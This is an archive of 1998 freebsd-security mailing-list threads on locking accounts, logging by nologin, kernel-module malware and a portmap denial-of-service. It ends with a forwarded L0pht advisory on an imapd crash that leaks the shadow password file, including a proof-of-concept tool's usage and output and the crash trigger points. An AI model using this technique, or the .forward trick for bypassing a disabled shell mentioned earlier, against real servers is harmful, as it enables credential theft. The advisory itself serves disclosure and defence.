From owner-freebsd-security Sun May 24 23:34:58 1998
Message-Id: <199805250528.WAA10561@antipodes.cdrom.com>
To: Wes Peters
cc: Philippe Regnauld, Mike Smith, freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-reply-to: Your message of "Fri, 22 May 1998 07:24:54 MDT." <35657CA6.D93AC10D@softweyr.com>
Date: Sun, 24 May 1998 22:28:50 -0700
From: Mike Smith

> Yeah, this little bit of UNIX arcana has been batted back and forth
> for years.  At least FreeBSD *has* a nologin program, see nologin(8).
> I don't like it, because it doesn't log the failed access.  Here's my
> replacement, which does:

> syslog(LOG_CRIT, "%s on %s", user, device);

Why LOG_CRIT? I would have expected something a little lower perhaps?
(Especially if you're using it in an ISP context...)

At any rate, how do people feel about this?  How about a shellscript
version using logger(8)?

--
\\  Sometimes you're ahead,       \\  Mike Smith
\\  sometimes you're behind.      \\  mike@smith.net.au
\\  The race is long, and in the  \\  msmith@freebsd.org
\\  end it's only with yourself.  \\  msmith@cdrom.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message

From owner-freebsd-security Mon May 25 00:44:19 1998
Message-ID: <19980525094211.24803@deepo.prosa.dk>
Date: Mon, 25 May 1998 09:42:11 +0200
From: Philippe Regnauld
To: Mike Smith
Cc: Are Bryne, freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
References: <199805232247.PAA02689@antipodes.cdrom.com>
In-Reply-To: <199805232247.PAA02689@antipodes.cdrom.com>; from Mike Smith on Sat, May 23, 1998 at 03:47:50PM -0700
Organization: PROSA

Mike Smith writes:
> >
> > Then perhaps the default /nonexistent 'shell' for various password file
> > entries should be changed also?
>
> It would probably make sense to have /sbin/nologin the default shell
> for those accounts, yes.  Want to file a PR?

Give me a day or so (if someone else doesn't do it), I'll
write up the PR (man page patch + PR for /nonexistent).

--
 -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-

 «Pluto placed his bad dog at the entrance of Hades to keep the dead
 IN and the living OUT! The archetypical corporate firewall?»
                                                   - S. Kelly Bootle

From owner-freebsd-security Mon May 25 00:44:46 1998
Message-ID: <19980525094331.20142@deepo.prosa.dk>
Date: Mon, 25 May 1998 09:43:31 +0200
From: Philippe Regnauld
To: Mike Smith
Cc: Wes Peters, freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
References: <35657CA6.D93AC10D@softweyr.com> <199805250528.WAA10561@antipodes.cdrom.com>
In-Reply-To: <199805250528.WAA10561@antipodes.cdrom.com>; from Mike Smith on Sun, May 24, 1998 at 10:28:50PM -0700
Organization: PROSA

Mike Smith writes:
> > syslog(LOG_CRIT, "%s on %s", user, device);
>
> Why LOG_CRIT? I would have expected something a little lower perhaps?
> (Especially if you're using it in an ISP context...)
>
> At any rate, how do people feel about this?  How about a shellscript
> version using logger(8)?

I'd like failed logins (at least on disabled accounts) to be logged,
yes.  It would also be a nice plus if logging could be limited...

--
 -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-

 «Pluto placed his bad dog at the entrance of Hades to keep the dead
 IN and the living OUT! The archetypical corporate firewall?»
                                                   - S. Kelly Bootle

From owner-freebsd-security Mon May 25 01:19:19 1998
Message-Id: <199805250715.AAA11151@antipodes.cdrom.com>
To: Philippe Regnauld
cc: Wes Peters, freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-reply-to: Your message of "Mon, 25 May 1998 09:43:31 +0200." <19980525094331.20142@deepo.prosa.dk>
Date: Mon, 25 May 1998 00:15:06 -0700
From: Mike Smith

> Mike Smith writes:
> > > syslog(LOG_CRIT, "%s on %s", user, device);
> >
> > Why LOG_CRIT? I would have expected something a little lower perhaps?
> > (Especially if you're using it in an ISP context...)
> >
> > At any rate, how do people feel about this?  How about a shellscript
> > version using logger(8)?
>
> I'd like failed logins (at least on disabled accounts) to be logged,
> yes.  It would also be a nice plus if logging could be limited...

Limiting is a bit difficult (no state is preserved across multiple
nologin invocations).  You could perhaps rely on the 'last message
repeat' feature in syslog...

--
\\  Sometimes you're ahead,       \\  Mike Smith
\\  sometimes you're behind.      \\  mike@smith.net.au
\\  The race is long, and in the  \\  msmith@freebsd.org
\\  end it's only with yourself.  \\  msmith@cdrom.com

From owner-freebsd-security Mon May 25 05:33:25 1998
Date: Mon, 25 May 1998 14:31:41 +0200 (MET DST)
From: Janos Mohacsi
To: Wes Peters
cc: freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-Reply-To: <35657CA6.D93AC10D@softweyr.com>

On Fri, 22 May 1998, Wes Peters wrote:

> Date: Fri, 22 May 1998 07:24:54 -0600
> From: Wes Peters
> To: Philippe Regnauld
> Cc: Mike Smith, freebsd-security@FreeBSD.ORG
> Subject: Re: SKey and locked account
>
> Philippe Regnauld wrote:
> > Ok -- just referring to the man page:
> >
> >      The password field is the encrypted form of the password.  If the
> >      password field is empty, no password will be required to gain access to
> >      the machine.  This is almost invariably a mistake.  Because these files
> >      contain the encrypted user passwords, they should not be readable by any-
> >      one without appropriate privileges.  Administrative accounts have a pass-
> >      word field containing an asterisk `*' which disallows normal logins.
> >
> > ... it doesn't mention the fact that they _also_ have an invalid
> > shell.
>
> Yeah, this little bit of UNIX arcana has been batted back and forth
> for years.  At least FreeBSD *has* a nologin program, see nologin(8).
> I don't like it, because it doesn't log the failed access.  Here's my

Can't the logging be done by the program with logger(1)?

> replacement, which does:

Janos Mohacsi

From owner-freebsd-security Mon May 25 06:52:49 1998
Date: Mon, 25 May 1998 15:51:49 +0200 (MET DST)
From: Janos Mohacsi
To: freebsd-security@FreeBSD.ORG
Subject: SRP integration

Hi!

Is there anybody doing SRP (Secure Remote Password) integration into the
FreeBSD security system? If not, how could I join the team of developers
who are maintaining the security system of FreeBSD? Or should I just
send diffs, if I am ready?

Sincerely,

Janos Mohacsi

From owner-freebsd-security Mon May 25 07:59:45 1998
Date: Mon, 25 May 1998 10:59:22 -0400 (EDT)
Message-Id: <199805251459.KAA05536@brain.zeus.leitch.com>
From: woods@zeus.leitch.com (Greg A. Woods)
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: Philippe Regnauld's message of "Fri, May 22, 1998 16:06:19 +0200" regarding "Re: Virus on FreeBSD" id <19980522160618.52012@deepo.prosa.dk>
References: <01BD8571.D24221F0@PCNTWS1> <19980522160618.52012@deepo.prosa.dk>
Reply-To: freebsd-security@FreeBSD.ORG
Organization: Planix, Inc.; Toronto, Ontario; Canada

[ On Fri, May 22, 1998 at 16:06:19 (+0200), Philippe Regnauld wrote: ]
> Subject: Re: Virus on FreeBSD
>
> Robert Watson writes:
>
> > To protect the kernel properly, lkms need to be disabled at a sufficiently
> > high run-level (possibly always), and appropriate file system stuff
> > protected.  Personally, I like the idea of using a CD-ROM for a file
> > system, but it's not so very fast.
>
> 32x will deliver pretty good performance -- not unlike a washing
> machine on spin-cycle, but ok.

You'll have much more luck, more performance, and much higher MTBF, if
you find a SCSI drive that has a physical write-protect jumper.  Such
critters do exist, for example the Seagate Cheetah 4LP (ST34501).

--
Greg A. Woods

+1 416 443-1734 VE3TCP
Planix, Inc.
; Secrets of the Weird

From owner-freebsd-security Mon May 25 08:11:26 1998
Date: Mon, 25 May 1998 11:10:42 -0400 (EDT)
Message-Id: <199805251510.LAA05638@brain.zeus.leitch.com>
From: woods@zeus.leitch.com (Greg A. Woods)
To: ark@eltex.spb.ru
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: ark@eltex.spb.ru's message of "Fri, May 22, 1998 14:02:08 GMT" regarding "Re: Virus on FreeBSD" id <199805221402.OAA16417@paranoid.eltex.spb.ru>
References: <199805211901.PAA23176@brain.zeus.leitch.com> <199805221402.OAA16417@paranoid.eltex.spb.ru>
Reply-To: freebsd-security@FreeBSD.ORG
Organization: Planix, Inc.; Toronto, Ontario; Canada

[ On Fri, May 22, 1998 at 14:02:08 (GMT), ark@eltex.spb.ru wrote: ]
> Subject: Re: Virus on FreeBSD
>
> 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does
> something for that system.

Looks like the RELENG_2_1_0 branch only has the changes to disallow LKM
manipulations in "secure mode" (i.e. securelevel > 0) (prior to 2.1.5).

RELENG_2_2 had the NO_LKM option pulled in as of 2.2.6.

Now that I look at the way NO_LKM was implemented, I think it could be a
*lot* more aggressive in the amount of code it comments out.  All it
appears to do now is inhibit the initialization of the LKM "driver".

--
Greg A. Woods

+1 416 443-1734 VE3TCP
Planix, Inc.
; Secrets of the Weird

From owner-freebsd-security Mon May 25 08:18:41 1998
Date: Mon, 25 May 1998 11:18:27 -0400 (EDT)
Message-Id: <199805251518.LAA05684@brain.zeus.leitch.com>
From: woods@zeus.leitch.com (Greg A. Woods)
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
In-Reply-To: Nicholas Charles Brawn's message of "Fri, May 22, 1998 10:02:46 +1000" regarding "Re: Virus on FreeBSD" id
References: <199805211431.KAA17444@brain.zeus.leitch.com>
Reply-To: freebsd-security@FreeBSD.ORG
Organization: Planix, Inc.; Toronto, Ontario; Canada

[ On Fri, May 22, 1998 at 10:02:46 (+1000), Nicholas Charles Brawn wrote: ]
> Subject: Re: Virus on FreeBSD
>
> > I'd love to have a "virus" scanner that could detect the signature of a
> > LKM module or the LKM loader in a kernel.  Of course by "signature" here
> > I mean something that would recognize the style of code necessary to
> > perform this operation, not the specific sequence of bits in any given
> > implementation.
>
> You may have a point here. Is there any way you could "sign" a module to
> ensure its authenticity? And on top of that build in an automatic
> authentication system within the kernel that rejects lkm's that are not
> signed? Perhaps this could be included so as to be performed at one of the
> securelevels?

I meant that the other way around.  I don't think I'd trust such
signatures.  If the system has been cracked enough that someone is
trying to load some untrusted module, then how can I trust the
signature, no matter where I retrieve it from?

I meant some way to detect the pattern of code in the *kernel* that is
necessary to implement a module loader.  I don't have my hopes up, of
course, as this is indeed a very simple operation and not a whole lot
different than any number of other operations an OS performs.

Detecting the pattern of code of a loadable module in files might be a
good thing too, as you could then scan for hidden instances of such
modules.  Of course any cracker worth their salt would at least obscure
the contents of the file with some trivial "encryption" mechanism....  :-)

--
Greg A. Woods

+1 416 443-1734 VE3TCP
Planix, Inc.; Secrets of the Weird

From owner-freebsd-security Mon May 25 08:35:50 1998
Date: Mon, 25 May 1998 11:35:37 -0400 (EDT)
Message-Id: <199805251535.LAA05810@brain.zeus.leitch.com>
From: woods@zeus.leitch.com (Greg A. Woods)
To: freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-Reply-To: Matthew N. Dodd's message of "Fri, May 22, 1998 12:35:15 -0400" regarding "Re: SKey and locked account " id
Reply-To: woods@zeus.leitch.com (Greg A. Woods)
Organization: Planix, Inc.; Toronto, Ontario; Canada

[ On Fri, May 22, 1998 at 12:35:15 (-0400), Matthew N. Dodd wrote: ]
> Subject: Re: SKey and locked account
>
> On Fri, 22 May 1998, Snob Art Genre wrote:
> > How?  I don't like this: isn't it standard practice across unixes to set
> > a nonexistent shell to disable logins?  POLA etc.
>
> I remember getting around this by ftp'ing a .forward file containing nice
> things to reset my shell.  Of course, this assumes that ftp is setup as to
> allow logins for users with 'invalid' shells.

Usually that's an accident (i.e. allowing ftp for users with "invalid"
shells), sometimes based on a nasty but all too common misunderstanding
about /etc/shells.

Naturally /sbin/nologin should *never* be included in /etc/shells.  If
someone thinks they want it there then they really need to think of some
other way to allow users to disable their accounts on their own!  ;-)

Unfortunately the shells(5) manual page doesn't mention this quirk
related to ftpd [I'll file a PR if I remember when I have a spare
moment].

Of course if you really want to disable a user's account then you should
set their shell to /sbin/nologin, *AND* disable their password, either
by adding some string such as "*NOLOGIN*" to the beginning of the field
(in order to invalidate their current password but leave it intact), or
simply replace the entire field contents with an invalid encrypted
string, such as "*".

Note too that SSH at one time did not correctly implement password field
handling for invalid encrypted strings (and may still not do so) and in
addition it (until the most recent release) revealed the existence of an
account by giving a different response to an incorrect password.  I've
still not had time to examine the code to see that this was fixed on the
server side either -- if not then a malicious client could still be used
to probe for valid accounts.

--
Greg A. Woods

+1 416 443-1734 VE3TCP
Planix, Inc.
; Secrets of the Weird

From owner-freebsd-security Mon May 25 10:35:50 1998
Message-ID: <19980525123417.A19300@mu.org>
Date: Mon, 25 May 1998 12:34:17 -0500
From: Paul Saab
To: freebsd-security@FreeBSD.ORG
Subject: possible problem with portmap

Today I logged into our server and noticed someone sitting on port
111.  Are there any known problems with portmap?

this is what I got from netstat..
tcp        0      0  tranq1.sunrpc          dialup239-1-15.s.2988  ESTABLISHED
tcp        0      0  tranq1.sunrpc          dialup239-1-15.s.2987  ESTABLISHED

Thanks.
paul

From owner-freebsd-security Mon May 25 12:45:43 1998
From: Dave Chapeskie
Message-ID: <19980525154439.60457@ddm.on.ca>
Date: Mon, 25 May 1998 15:44:39 -0400
To: freebsd-security@FreeBSD.ORG
Subject: Re: Virus on FreeBSD
References: <199805211431.KAA17444@brain.zeus.leitch.com> <199805251518.LAA05684@brain.zeus.leitch.com>
In-Reply-To: <199805251518.LAA05684@brain.zeus.leitch.com>; from Greg A. Woods on Mon, May 25, 1998 at 11:18:27AM -0400

On Mon, May 25, 1998 at 11:18:27AM -0400, Greg A. Woods wrote:
> I meant some way to detect the pattern of code in the *kernel* that is
> necessary to implement a module loader.

This would be a waste of effort IMHO.  When you build the kernel you
check what you are compiling in at the source level (as you've done by
checking what the NO_LKM define actually disables).
If someone else has the ability to change or replace the kernel on you
(either on disk or in memory) then you're already screwed and LKMs are
the least of your worries :-)

> Detecting the pattern of code of a loadable module in files might
> be a good thing too, as you could then scan for hidden instances
> of such modules.  Of course any cracker worth their salt would at
> least obscure the contents of the file with some trivial "encryption"
> mechanism....  :-)

Why waste your time with "trivial" encryption when there are lots of
implementations of really good encryption freely available?

In general I find the idea of searching for "code patterns" to be a
waste of effort.  Like the guy who wrote a perl script that looked for
code that was designed to crash machines using the pentium 'FOOF' bug.
The script looked for the four byte pattern in files... it's real easy
to build up the required four bytes dynamically and then run them
(assuming of course that the memory protection mechanism provided by
the OS either allows executing from the data area or writing to the
code area).
-- Dave Chapeskie , DDM Consulting To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 13:14:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA26275 for freebsd-security-outgoing; Mon, 25 May 1998 13:14:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles348.castles.com [208.214.167.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA26268 for ; Mon, 25 May 1998 13:14:24 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id MAA13972; Mon, 25 May 1998 12:10:21 -0700 (PDT) Message-Id: <199805251910.MAA13972@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Paul Saab cc: freebsd-security@FreeBSD.ORG Subject: Re: possible problem with portmap In-reply-to: Your message of "Mon, 25 May 1998 12:34:17 CDT." <19980525123417.A19300@mu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 25 May 1998 12:10:21 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Today I logged into our server and noticed someone sitting on port > 111. Are there any known problems with portmap? Yes. > this is what I got from netstat.. > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2988 ESTABLISHED > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2987 ESTABLISHED Find out who the dialup user is; they're engaged in a portmap-related DoS attack on you. There were changes committed a few days back to address this - it was also discussed on BugTraq (with a not inconsiderable degree of hysteria it seems). -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. 
\\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 13:34:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA29508 for freebsd-security-outgoing; Mon, 25 May 1998 13:34:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from priscilla.mu.org (paul@priscilla.mu.org [206.156.231.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA29475 for ; Mon, 25 May 1998 13:34:19 -0700 (PDT) (envelope-from paul@priscilla.mu.org) Received: (from paul@localhost) by priscilla.mu.org (8.8.8/8.8.8) id PAA20156; Mon, 25 May 1998 15:33:01 -0500 (CDT) (envelope-from paul) Message-ID: <19980525153301.A20100@mu.org> Date: Mon, 25 May 1998 15:33:01 -0500 From: Paul Saab To: Mike Smith Cc: freebsd-security@FreeBSD.ORG Subject: Re: possible problem with portmap References: <19980525123417.A19300@mu.org> <199805251910.MAA13972@antipodes.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <199805251910.MAA13972@antipodes.cdrom.com>; from Mike Smith on Mon, May 25, 1998 at 12:10:21PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk OK.. I disabled sunrpc (port 111) at the router. Is the worst thing that could have happened to me be just a DoS of portmap-related stuff? Ie: he could not have gotten root? Thanks, Paul Mike Smith (mike@smith.net.au) wrote: > > Today I logged into our server and noticed someone sitting on port > > 111. Are there any known problems with portmap? > > Yes. > > > this is what I got from netstat.. > > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2988 ESTABLISHED > > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2987 ESTABLISHED > > Find out who the dialup user is; they're engaged in a portmap-related > DoS attack on you. 
>
> There were changes committed a few days back to address this - it was
> also discussed on BugTraq (with a not inconsiderable degree of hysteria
> it seems).
>
> --
> \\ Sometimes you're ahead,       \\ Mike Smith
> \\ sometimes you're behind.      \\ mike@smith.net.au
> \\ The race is long, and in the  \\ msmith@freebsd.org
> \\ end it's only with yourself.  \\ msmith@cdrom.com
>

From owner-freebsd-security Mon May 25 13:36:29 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA00142 for freebsd-security-outgoing; Mon, 25 May 1998 13:36:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from www.communique.no (www.communique.no [193.212.204.33]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA00125 for ; Mon, 25 May 1998 13:36:17 -0700 (PDT) (envelope-from are@communique.no)
Received: (qmail 6364 invoked by uid 1001); 25 May 1998 20:41:54 -0000
Date: Mon, 25 May 1998 22:41:53 +0200 (CEST)
From: Are Bryne
X-Sender: are@rune.communique.no
To: Philippe Regnauld
cc: Mike Smith , freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-Reply-To: <19980525094211.24803@deepo.prosa.dk>
Message-ID:
Organization: Communique DA
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Mon, 25 May 1998, Philippe Regnauld wrote:

> Mike Smith writes:
> > >
> > > Then perhaps the default /nonexistent 'shell' for various password file
> > > entries should be changed also?
> >
> > It would probably make sense to have /sbin/nologin the default shell
> > for those accounts, yes. Want to file a PR?
>
> Give me a day or so (if someone else doesn't do it), I'll
> write up the PR (man page patch + PR for /nonexistent).

I had already done so (sent the PR), and notified Mike Smith, but didn't think it worthy of the list...
The man page patch would, I take it, be most welcome.

Here is the response:

Thank you very much for your problem report.
It has the internal identification `conf/6739'.
The individual assigned to look at your report is: freebsd-bugs.

>Category: conf
>Responsible: freebsd-bugs
>Synopsis: Proposing a change to default '/nonexistent' passwd shell entry
>Arrival-Date: Sun May 24 07:20:00 PDT 1998

Regards,
Are

From owner-freebsd-security Mon May 25 14:07:33 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04477 for freebsd-security-outgoing; Mon, 25 May 1998 14:07:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from antipodes.cdrom.com (castles348.castles.com [208.214.167.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04448 for ; Mon, 25 May 1998 14:07:11 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com)
Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id NAA14219; Mon, 25 May 1998 13:02:58 -0700 (PDT)
Message-Id: <199805252002.NAA14219@antipodes.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: Paul Saab
cc: Mike Smith , freebsd-security@FreeBSD.ORG
Subject: Re: possible problem with portmap
In-reply-to: Your message of "Mon, 25 May 1998 15:33:01 CDT." <19980525153301.A20100@mu.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 25 May 1998 13:02:58 -0700
From: Mike Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> OK.. I disabled sunrpc (port 111) at the router. Is the worst
> thing that could have happened to me be just a DoS of portmap-related
> stuff? Ie: he could not have gotten root?

That's correct (RPC DoS).

--
\\ Sometimes you're ahead,       \\ Mike Smith
\\ sometimes you're behind.      \\ mike@smith.net.au
\\ The race is long, and in the  \\ msmith@freebsd.org
\\ end it's only with yourself.  \\ msmith@cdrom.com

From owner-freebsd-security Tue May 26 08:39:07 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA17435 for freebsd-security-outgoing; Tue, 26 May 1998 08:39:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA17419 for ; Tue, 26 May 1998 08:38:45 -0700 (PDT) (envelope-from spork@super-g.com)
Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id LAA14764; Tue, 26 May 1998 11:36:50 -0400 (EDT)
Date: Tue, 26 May 1998 11:36:50 -0400 (EDT)
From: spork
X-Sender: spork@super-g.inch.com
To: Mike Smith
cc: Paul Saab , freebsd-security@FreeBSD.ORG
Subject: Re: possible problem with portmap
In-Reply-To: <199805252002.NAA14219@antipodes.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Did anyone quite understand the "nfs-shell" thread on bugtraq? It was
discussed shortly after the portmap DoS thread. From what I could gather
you could get an interactive shell via nfs??

Thanks,

Charles

Charles Sprickman
spork@super-g.com
----

On Mon, 25 May 1998, Mike Smith wrote:

> > OK.. I disabled sunrpc (port 111) at the router. Is the worst
> > thing that could have happened to me be just a DoS of portmap-related
> > stuff? Ie: he could not have gotten root?
>
> That's correct (RPC DoS).
>
> --
> \\ Sometimes you're ahead,       \\ Mike Smith
> \\ sometimes you're behind.      \\ mike@smith.net.au
> \\ The race is long, and in the  \\ msmith@freebsd.org
> \\ end it's only with yourself.  \\ msmith@cdrom.com
>

From owner-freebsd-security Tue May 26 09:16:09 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA25403 for freebsd-security-outgoing; Tue, 26 May 1998 09:16:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA25209 for ; Tue, 26 May 1998 09:15:44 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id UAA10261; Tue, 26 May 1998 20:16:43 +0200
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id SAA08097; Tue, 26 May 1998 18:15:13 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id SAA11861; Tue, 26 May 1998 18:14:25 +0200 (CEST)
Message-ID: <19980526181425.28553@deepo.prosa.dk>
Date: Tue, 26 May 1998 18:14:25 +0200
From: Philippe Regnauld
To: spork
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: possible problem with portmap
References: <199805252002.NAA14219@antipodes.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.88e
In-Reply-To: ; from spork on Tue, May 26, 1998 at 11:36:50AM -0400
X-Operating-System: FreeBSD 2.2.5-STABLE i386
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

spork writes:
> Did anyone quite understand the "nfs-shell" thread on bugtraq? It was
> discussed shortly after the portmap DoS thread. From what I could gather
> you could get an interactive shell via nfs??

Err, I think it was more like a command-shell to test/debug
NFS-related things.

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
«Pluto placed his bad dog at the entrance of Hades to keep the dead IN and
the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle

From owner-freebsd-security Tue May 26 10:51:15 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA14513 for freebsd-security-outgoing; Tue, 26 May 1998 10:51:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from tiger.acsu.k12.vt.us (tiger.acsu.k12.vt.us [170.222.18.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA14198 for ; Tue, 26 May 1998 10:50:03 -0700 (PDT) (envelope-from jflemer@tiger.acsu.k12.vt.us)
Received: (from jflemer@localhost) by tiger.acsu.k12.vt.us (8.8.7/8.8.7) id NAA06996; Tue, 26 May 1998 13:49:59 -0400 (EDT)
Date: Tue, 26 May 1998 13:49:59 -0400 (EDT)
From: James Flemer
Message-Id: <199805261749.NAA06996@tiger.acsu.k12.vt.us>
To: freebsd-security@FreeBSD.ORG
Subject: imapd_4.1b.txt
X-URL: http://rootshell.com/archive-ld8dkslxlxja/199710/imapd_4.1b.txt
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

L0pht Security Advisory

Advisory released Oct 8 1997
Application: imapd (imap-4.1BETA from the IMAP 4.1 toolkit from University of Washington)
Severity: any user with an account can remotely grab the shadowed password file.
Author: mudge@l0pht.com
http://www.l0pht.com/advisories.html

Scenario:

It is possible to crash the imapd server in several possible places.
Due to the lack of handling for the SIGABRT signal and the nature
of the IMAP protocol in storing folders locally on the server; a core dump
is produced in the users current directory. This core dump contains the
password and shadow password files from the system.

Example:

  ./imap_core.sh
  usage: imap_core.sh target username password

  ./imap_core.sh target jdoe letmein

  imap_core.sh -
   this is a quick proof of concept tool that causes some imapd
   implementations to dump core. Unfortunately the core file
   contains the password and shadow password file in it!
   .mudge [mudge@l0pht.com]

  [Starting]
  Built base64 decoder...

  Running imap attack...

  Forced server to dump core. Reconnecting to grab file and clean up!
  Stripping trailing c/r from RFC822 base64 encapsulated core file
  Removing imap crap from beginning and end of core.24487

  Converting base64 image to binary core file...
  core.24487: ELF 32-bit MSB core file SPARC Version 1, from 'imapd'

  Successfully grabbed some form of password file for target.com
   results located in ./etc_passwd.target.com
  Successfully grabbed some form of shadow file for target.com
   results located in ./etc_shadow.target.foo.bar
   [note: some manual cleanup of ./etc_shadow.target.com is probably required]

  [Finished]

Description:

In several situations it is possible to make the imapd server call the
function fatal() which is as follows in osdep/unix/ftl_unix.c:

  /* Report a fatal error
   * Accepts: string to output
   */

  void fatal (char *string)
  {
    mm_fatal (string);   /* pass up the string */
    syslog (LOG_ALERT,"IMAP toolkit crash: %.100s",string);
    abort ();            /* die horribly */
  }

If SIGABRT is caught and the signal handler does not return, things would
be okay, life would go on, and Frank Zappa's death would be a big sick joke.
However, SIGABRT is not caught or ignored.

Since part of the beauty of the IMAP protocol is that you can maintain
your mailboxes on the server, your directory must be writable by at least
yourself.

What happens when SIGABRT is not caught, not ignored, and the current
directory is writable? core dump.

Here are just a few of the areas where fatal() is called.

  c-client/mail.c: if (stream->lock) fatal ("Lock when already locked");
  c-client/mail.c: if (!stream->lock) fatal ("Unlock when not locked");
  imapd/imapd.c: if (quell_events) fatal ("Impossible EXPUNGE event");
  osdep/unix/fs_unix.c: if (!block) fatal ("Out of free storage");
  osdep/unix/fs_unix.c: fatal ("Can't resize free storage");
  osdep/unix/env_unix.c: if (myUserName) fatal ("env_init called twice!");
  osdep/unix/dummy.c: fatal ("Impossible dummy_copy");

Solution:

There are several places where imapd can be forced to abort(3C). There
are also several ways to prevent each area. As opposed to forcing our
preferred way of fixing the code and thus precluding potentially more
elegant patches we choose to suggest a blanket solution. This should
allow the author of the application to fix these problems as he sees
fit while alerting everyone (good and bad) of the problem and a stop-gap
fix in the mean time.

This said, we recommend that core dumps not be permitted from any
application running out of inetd. If you need to test these things do
so in a controlled environment. No production machine should be allowed
to crap all over the place.

"But wait!", You say, "what if we think the application is robust and
then realize there is a problem later on. We need that core file".

Face it, there are very few people out there that know what to do with
core files other than rm(1) them. However, if this is the case then you
saved yourself some heartache. Now that you know the application is not
ready for prime time you can pull it back into a controlled environment
and attempt to make it dump core again.

